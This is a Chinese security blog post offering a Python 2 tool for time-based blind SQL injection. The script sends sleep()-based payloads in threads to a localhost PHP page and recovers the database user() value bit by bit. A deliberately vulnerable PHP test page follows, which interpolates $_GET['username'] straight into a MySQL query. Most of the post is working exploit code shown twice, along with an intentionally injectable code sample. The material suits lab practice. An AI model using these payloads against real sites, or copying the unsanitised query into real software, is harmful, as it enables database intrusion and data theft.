延迟注入工具(python)

  • A+
所属分类:moonsec_com
摘要

延迟注入工具(python) #!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): def __init__(self, str,x): threading.Thread.__init__(self) self.str = str self.x = x def run(self): global res x=self.x j = self.str url = “http://localhost/pentest/1.php?username=root’+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29,” + str(x) + “,1%29%29%29,8,0%29,”+ str(j) + “,1%29%29,sleep%282%29,0%29%23″ html = request(url) verify = ‘timeout’ if verify not in html: res[str(j)] = 0 #print 1 else: res[str(j)] = 1 def request(URL): user_agent = { ‘User-Agent’ : ‘Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10’ } req = urllib2.Request(URL, None, user_agent) try: request = urllib2.urlopen(req,timeout=2) except Exception ,e: time.sleep(2) return ‘timeout’ return request.read() def curl(url): try: start = time.clock() requests.get(url) end = time.clock() return int(end) except requests.RequestException as e: print u”访问出错!” exit() def getLength(): i = 0 while True: print “[+] Checking: %s /r” %i url = “http://localhost/pentest/1.php?username=root ‘+and+sleep(if(length((select%20user()))=”+ str(i) +”,1,0))%23″ html = request(url) verify = ‘timeout’ if verify in html: print u”[+] 数据长度为: %s” %i return i i = i + 1 def bin2dec(string_num): return int(string_num, 2) def getData(dataLength): global res data = “” for x in range(dataLength): x = x + 1 #print x threads = [] for j in range(8): result = “” j = j + 1 sb = my_threading(j,x) sb.setDaemon(True) threads.append(sb) #print j for t in threads: t.start() for t in threads: t.join() #print res tmp = “” for i in range(8): tmp = tmp + str(res[str(i+1)]) #print chr(bin2dec(tmp)) res = {} result = chr(bin2dec(tmp)) print result data = data + result sb = None print “[+] ok!” print “[+] result:” + data if __name__ == ‘__main__’: stop = False res = {} length = getLength() getData(length)

延迟注入工具(python)

#!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread):     def __init__(self, str,x):         threading.Thread.__init__(self)         self.str = str         self.x = x     def run(self):       global res       x=self.x       j = self.str       url = "http://localhost/pentest/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"       html = request(url)       verify = 'timeout'       if verify not in html:         res[str(j)] = 0         #print 1       else:         res[str(j)] = 1  def request(URL):   user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }   req = urllib2.Request(URL, None, user_agent)   try:     request = urllib2.urlopen(req,timeout=2)   except Exception ,e:     time.sleep(2)     return 'timeout'   return request.read() def curl(url):   try:       start = time.clock()       requests.get(url)       end = time.clock()       return int(end)   except requests.RequestException as e:       print u"访问出错!"       exit() def getLength():   i = 0   while True:     print "[+] Checking: %s /r" %i     url = "http://localhost/pentest/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"     html = request(url)     verify = 'timeout'     if verify in html:       print u"[+] 数据长度为: %s" %i       return i     i = i + 1 def bin2dec(string_num):   return int(string_num, 2) def getData(dataLength):   global res   data = ""   for x in range(dataLength):     x = x + 1     #print x     threads = []     for j in range(8):       result = ""       j = j + 1       sb = my_threading(j,x)       sb.setDaemon(True)       threads.append(sb)       #print j     for t in threads:         t.start()     for t in threads:         t.join()     #print res     tmp = ""     for i in range(8):         tmp = tmp + str(res[str(i+1)])     #print chr(bin2dec(tmp))     res = {}     result = chr(bin2dec(tmp))     print result     data = data + result     sb = None   print "[+] ok!"   print "[+] result:" + data  if __name__ == '__main__':   stop = False   res = {}   length = getLength()   getData(length)

 

延迟注入工具(python)

可以搞一定复杂的环境

php脚本 修改一下 <?php
/*
* 延迟注入测试
*/
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","123456");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
echo $sql;
$query = mysql_query($sql);
echo "123123123";
?>

 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: